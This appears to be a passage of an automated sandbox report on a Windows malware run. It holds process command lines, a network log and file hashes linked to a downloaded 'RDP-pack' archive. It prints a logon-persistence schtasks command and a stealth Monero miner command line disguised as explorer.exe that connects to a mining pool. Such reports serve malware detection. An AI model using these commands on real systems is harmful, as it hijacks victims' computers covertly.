schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.9.822124245\1686608703" -childID 8 -isForBrowser -prefsHandle 4304 -prefMapHandle 4300 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b2a49fc-8d97-4ea8-8ac8-ff8c59066afc} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 4292 19438b60558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.10.988196284\1967470953" -childID 9 -isForBrowser -prefsHandle 5248 -prefMapHandle 5244 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de546d21-cb45-4394-99ed-86acd2401a70} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 5220 1943256b858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.11.78314202\1347614734" -childID 10 -isForBrowser -prefsHandle 5096 -prefMapHandle 5220 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0132a955-0b5f-403a-a303-e2b5bc3f750f} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 6240 1943256d358 tab
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7041271 --pass=aboba --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=1 --unam-idle-cpu=80 --unam-stealth
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.12.630532595\2098545785" -childID 11 -isForBrowser -prefsHandle 10444 -prefMapHandle 10420 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd624376-ae83-487f-bf93-1f832e2dc46c} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 10408 1943b594b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2964.13.1287435953\1836145485" -childID 12 -isForBrowser -prefsHandle 10272 -prefMapHandle 10268 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4837673-6439-47ed-9601-ff0fabc291b3} 2964 "\\.\pipe\gecko-crash-server-pipe.2964" 10280 1943b60ae58 tab
C:\Users\Admin\Downloads\WinPcap_4_1_3.exe
"C:\Users\Admin\Downloads\WinPcap_4_1_3.exe"
C:\Windows\SysWOW64\net.exe
net start npf
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start npf
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\1.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\1.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\1(1).txt
C:\Users\Admin\Desktop\Launch.exe
"C:\Users\Admin\Desktop\Launch.exe"
C:\Users\Admin\Desktop\Bin\TcpScanner.exe
"C:\Users\Admin\Desktop\Bin\TcpScanner.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49976 | tcp | |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 52.33.96.36:443 | shavar.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.96.33.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:49982 | tcp | |
| US | 8.8.8.8:53 | shorturl.at | udp |
| US | 104.26.8.129:80 | shorturl.at | tcp |
| US | 8.8.8.8:53 | shorturl.at | udp |
| US | 8.8.8.8:53 | shorturl.at | udp |
| US | 104.26.8.129:443 | shorturl.at | tcp |
| US | 8.8.8.8:53 | 129.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.shorturl.at | udp |
| US | 8.8.8.8:53 | www.shorturl.at | udp |
| US | 104.26.9.129:443 | www.shorturl.at | tcp |
| US | 8.8.8.8:53 | www.shorturl.at | udp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 104.21.13.139:443 | filetransfer.io | tcp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 104.21.13.139:443 | filetransfer.io | udp |
| US | 8.8.8.8:53 | d1f8f9xcsvx3ha.cloudfront.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 129.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d1f8f9xcsvx3ha.cloudfront.net | udp |
| CH | 18.165.185.38:443 | d1f8f9xcsvx3ha.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d1f8f9xcsvx3ha.cloudfront.net | udp |
| US | 8.8.8.8:53 | filetransfer.onfastspring.com | udp |
| US | 54.172.247.122:443 | filetransfer.onfastspring.com | tcp |
| US | 8.8.8.8:53 | filetransfer.onfastspring.com | udp |
| US | 8.8.8.8:53 | filetransfer.onfastspring.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 38.185.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.247.172.54.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s22.filetransfer.io | udp |
| US | 172.67.200.96:443 | s22.filetransfer.io | tcp |
| US | 8.8.8.8:53 | s22.filetransfer.io | udp |
| US | 8.8.8.8:53 | s22.filetransfer.io | udp |
| US | 8.8.8.8:53 | 96.200.67.172.in-addr.arpa | udp |
| US | 172.67.200.96:443 | s22.filetransfer.io | udp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 8.8.8.8:53 | filetransfer.io | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| RU | 77.88.44.242:80 | ya.ru | tcp |
| US | 8.8.8.8:53 | ya.ru | udp |
| RU | 77.88.44.242:80 | ya.ru | tcp |
| US | 8.8.8.8:53 | ya.ru | udp |
| RU | 77.88.44.242:443 | ya.ru | tcp |
| US | 8.8.8.8:53 | sso.passport.yandex.ru | udp |
| RU | 93.158.134.144:443 | sso.passport.yandex.ru | tcp |
| US | 8.8.8.8:53 | sso.passport.yandex.ru | udp |
| US | 8.8.8.8:53 | sso.passport.yandex.ru | udp |
| US | 8.8.8.8:53 | 242.44.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sso.ya.ru | udp |
| RU | 93.158.134.144:443 | sso.ya.ru | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 87.250.251.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | 215.131.154.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 77.88.55.88:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| RU | 87.250.247.182:443 | avatars.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| RU | 77.88.21.36:443 | favicon.yandex.net | tcp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.55.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.247.250.87.in-addr.arpa | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 36.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.178.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yabs.yandex.ru | udp |
| RU | 93.158.134.91:443 | yabs.yandex.ru | tcp |
| US | 8.8.8.8:53 | yabs.yandex.ru | udp |
| US | 8.8.8.8:53 | hdrc.yandex.net | udp |
| US | 8.8.8.8:53 | yabs.yandex.ru | udp |
| US | 8.8.8.8:53 | static-mon.yandex.net | udp |
| RU | 87.250.254.189:443 | hdrc.yandex.net | tcp |
| US | 8.8.8.8:53 | hdrc.yandex.net | udp |
| RU | 87.250.251.92:443 | static-mon.yandex.net | tcp |
| US | 8.8.8.8:53 | cryprox.yandex.net | udp |
| US | 8.8.8.8:53 | hdrc.yandex.net | udp |
| US | 8.8.8.8:53 | cryprox.yandex.net | udp |
| US | 8.8.8.8:53 | 91.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.254.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.winpcap.org | udp |
| US | 52.14.65.80:443 | www.winpcap.org | tcp |
| US | 8.8.8.8:53 | winpcap.org | udp |
| US | 8.8.8.8:53 | winpcap.org | udp |
| US | 52.14.65.80:443 | winpcap.org | tcp |
| US | 52.14.65.80:443 | winpcap.org | tcp |
| US | 52.14.65.80:443 | winpcap.org | tcp |
| US | 52.14.65.80:443 | winpcap.org | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | 80.65.14.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.21.88.77.in-addr.arpa | udp |
| US | 52.14.65.80:443 | winpcap.org | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | ysa-static.passport.yandex.ru | udp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | storage.mds.yandex.net | udp |
| RU | 213.180.204.158:443 | storage.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | storage.mds.yandex.net | udp |
| RU | 213.180.204.158:443 | storage.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | storage.mds.yandex.net | udp |
| US | 8.8.8.8:53 | 158.204.180.213.in-addr.arpa | udp |
| RU | 87.250.251.92:443 | cryprox.yandex.net | tcp |
| US | 8.8.8.8:53 | egress.yandex.net | udp |
| RU | 87.250.251.42:443 | egress.yandex.net | tcp |
| US | 8.8.8.8:53 | egress.yandex.net | udp |
| US | 8.8.8.8:53 | egress.yandex.net | udp |
| US | 8.8.8.8:53 | 42.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | 79.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1---sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | ya.ru | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | prod.balrog.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\d9dfe26b-e9d9-4f6f-8006-b34d189d85c0
| MD5 | 294e3a12e67ba51630e9f4b76d796fae |
| SHA1 | c23f62e871ecb31e6da2434646e673de34f31ed2 |
| SHA256 | a29cd17069224a2842fe25f1a1afac8e26083ec2c472f06e92258d382c796396 |
| SHA512 | 451ae3eb296f8b014c12f1a240a104675350dc1d9231a813aec950628ac7ecc46b05dafc02bd3e5ebe45703af73898afd122f4ddbf46a0f15fcde6c7e95220d9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\870de42a-ca7b-4945-9267-7883eebff243
| MD5 | b8790d765185e1ec7611cb5953f8a125 |
| SHA1 | 1eda8a2ebfe9fa55fd690f8467ef86422159da73 |
| SHA256 | 6ad4377324477e2e86e2313e8a5a08e352fb724472e312783194f82f87d3c265 |
| SHA512 | 3020b1e9499ad5543f5f90f67c34bc0ad746d4ab6b9a2b90599a30a256e880ab67180e489d81cad5fc49dc6392514472ecb59293f8317ec4e011ba6356d57b22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 971695c53f3c27b7ee388149b745ca9e |
| SHA1 | 6ea743c5b2342f247b40bcb1c02b1cf7037bc5d0 |
| SHA256 | 09590f8c4f6998b94abbf516c84d5608ac34a4c1b896723fdb5f755f1dc766b4 |
| SHA512 | b9cf4061ea62e0e91f96e6c2d65aedd6d6a7be6a3ad1c6114d1bc9329df3db46668a053b2edd8816939f177c31e26afe1645a0401ccb92c112581e3fe350551d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | e7d901ad03d22078f4c42ecc83c3bd45 |
| SHA1 | 13ffe2ced2026e6b99c39a96d006c7832a72ba17 |
| SHA256 | fddee54013f830a84e74dce5679f6e4c3c71b4c5c51ecdf58bcef7e27eba4f17 |
| SHA512 | 8e7373116183db845f03c74e28effbe85b53c6c109f0a1a867fc4daa2944c099846644c5b6ecfa6408091d097a08b3f1b8cedcbeffbdcfaa14147f6b76663ec9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 3e855da29107eb1b1e50b4c8c4f0bf48 |
| SHA1 | 6b9858898245c2b47874b3407f314f995dbf0e93 |
| SHA256 | e659e17f1afefd606dabeda118400d3b497c18901b30b44dc02f89ebace9af07 |
| SHA512 | b790a7f61774e597f71e63a730f2b38bddce261d03c11a97dffe1bfc6c7f4e1fadaf7608cddfef6743ac368dd997c3b762a2c60ff04f1246090e23ecad1cbe8b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js
| MD5 | 6e7b7dd7b3e96fff43d75e2a607ccdd8 |
| SHA1 | 708266a1f8b4ac9dc4acf71628777ef79ff6cb37 |
| SHA256 | 7d3d7af39849044d6f762f42c6de47b8689d7980adf55fc5fa8244520e0c5497 |
| SHA512 | 2ed3e6053928d5274b113ff9ace888a75ca1dddc8b286a2de272d854870156424f5ec490c8e056edf4c8523b4fc787e3a919b539f95cfa38da30b03e02ef6daf |
C:\Users\Admin\Downloads\RDP-pack.ledbOH7j.rar.part
| MD5 | ab2efe237000e9db497bd7eb5ddb75f0 |
| SHA1 | b5bf16af5327325bb5b67775a4e447b4f9b35f3a |
| SHA256 | f84fe1e21564120f7f4ef3bbc4724c149f369b0a8f0500e9e5927ddebada6dcd |
| SHA512 | 3e9c21eaa055882400989b6d3e28a111643b01a72248a544149d99cedb3d87c1da51d92a3d693ba2d213af305b9054d514e41ef4dd45b0377d4ed36b7f5e3563 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 70ac1d265a5e8d5fcba12fdf0e6bd9a0 |
| SHA1 | d7bfe3d267312bc89da405eee321a6bfb61246db |
| SHA256 | 9770a9bf5cc1fc2f89de217a31ba75c0294d2a6d426e38ec53b180d516407513 |
| SHA512 | 6ca492d829fb03933adcf33de90133a5933e9108e9ff523db7b9a30a7ca8359501b8cac13fdcbbce4277a6a11c2f720f50231eab9ddec35667b3e045e92eda90 |
C:\Users\Admin\Downloads\1.Uzi5L94P.txt.part
| MD5 | 728866b83e2f0736acbcfd6ab17e084f |
| SHA1 | fa53d6ba0b87471bcaeb856f17cc1933c6e693d6 |
| SHA256 | 2ab081b8997983467d5be4df0100ba44b70bcc9d5fd2e51564d2b596fb603798 |
| SHA512 | d11566db137de18596000004306c18d16736b8d8f7372d3e911aef799775954732ca753167b4f8b4772144e5b76ff4064d65342f191c9504b741b7c3721c68fb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a6cdd29e633a5ab9035fa1500894eb7f |
| SHA1 | 14c6c78051526a8bddbf61cd1691bc4c01adaf19 |
| SHA256 | 7de164220fa96d3ea9ccb5c82827fe2fd52e8a0e5aac60cd5a07eda2622b255d |
| SHA512 | d9897ce54509bced06303ff22030d45209988c71c840fdc6124a53799932f5be797c376eee552ebf18c9661a6934227b8a25b554fa778f580289ccf59ea67c71 |
\Program Files\7-Zip\7-zip.dll
| MD5 | 7ec019d8445f4dcdb91a380c9d592957 |
| SHA1 | 15fd8375e2e282a90d3df14041272e5ac29e7c93 |
| SHA256 | 1cc179f097ee439bb35a582059cbc727d9cea0d5c43dfaa57f9f03050cfaea03 |
| SHA512 | d71a79091fcc6a96c24d95662a18cc24145b9531145ef0bcb4e882c12f5bb5ca6c7a9b9e50024c9c0bf4cb6bf40dca7627cecbfddd637142d04a194e1956ae9b |
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 5764deed342ca47eb4b97ae94eedc524 |
| SHA1 | e9cbefd32e5ddd0d914e98cfb0df2592bebc5987 |
| SHA256 | c5c7ad094ad71d8784c8b0990bf37a55ffc7c7ab77866286d77b7b6721943e4f |
| SHA512 | 6809130394a683c56a0245906d709b2289a631f630055d5e6161b001e216d58045d314b0148512d8c01f0c2bf5f9f16e93fa7d61ab3d24beab4f9c3d4db13c18 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 38b18eda9c9a37401c14e732b5fdc33c |
| SHA1 | dd5125e75ac9586f9f33dd91286792a0a2085112 |
| SHA256 | a64adf8c4b43ceb7dd774ffbacbf059a7ff887d3e9930b23c68b11dd69d77201 |
| SHA512 | 857680da63ef826ac2e20210e9878cbdc119c560a028e63250b55d9e5127c8d677416fb2d2d17df8876219e71e356315e32443fd369512a1cf4a4f682c8c3090 |
C:\Program Files\7-Zip\7z.dll
| MD5 | 1939f878ae8d0cbcc553007480a0c525 |
| SHA1 | df9255af8e398e72925309b840b14df1ae504805 |
| SHA256 | 86926f78fad0d8c75c7ae01849bf5931f4484596d28d3690766f16c4fb943c19 |
| SHA512 | a5e4431f641e030df426c8f0db79d4cef81a67ee98e9253f79c1d9e41d4fc939de6f3fd5fc3a7170042842f69be2bb15187bf472eeaaf8edd55898e90b4f1ddd |
C:\Users\Admin\Downloads\RDP-pack.rar
| MD5 | 9484e0fbb7a0f7dc5cc2c150a2afd1b1 |
| SHA1 | b12fb34fbe91e1c829f766905884c3e4febe6b41 |
| SHA256 | f1c339500bb4b375c507c09fe5bac3fb49be4f4f8c6c278a56a23e79112daa6e |
| SHA512 | 26be18262f7f8c52c48b1449ff796735796e031fec2684b5a1c46a811baaaf9cda3485eb1bb506e462b638ccbce54020c077977a4c4b80406949cf6d3822dee7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | daddf28f753150e2f9a31214f45a2421 |
| SHA1 | 58c2dfbf52d8668b3a513af0052dc539ad84e7b0 |
| SHA256 | 0a636b59208491933bc826894a0bd8004aa7b36d8f4cd485d14a0993f75fb65e |
| SHA512 | 631b7f2a6888482c5c347c24f3bdb066ae1936ac417cd873b95a7a14cce6feac1fc63e2382bfd39b1592e8e778ce0b3126ae16b80af77bb16a411aba105c22d8 |
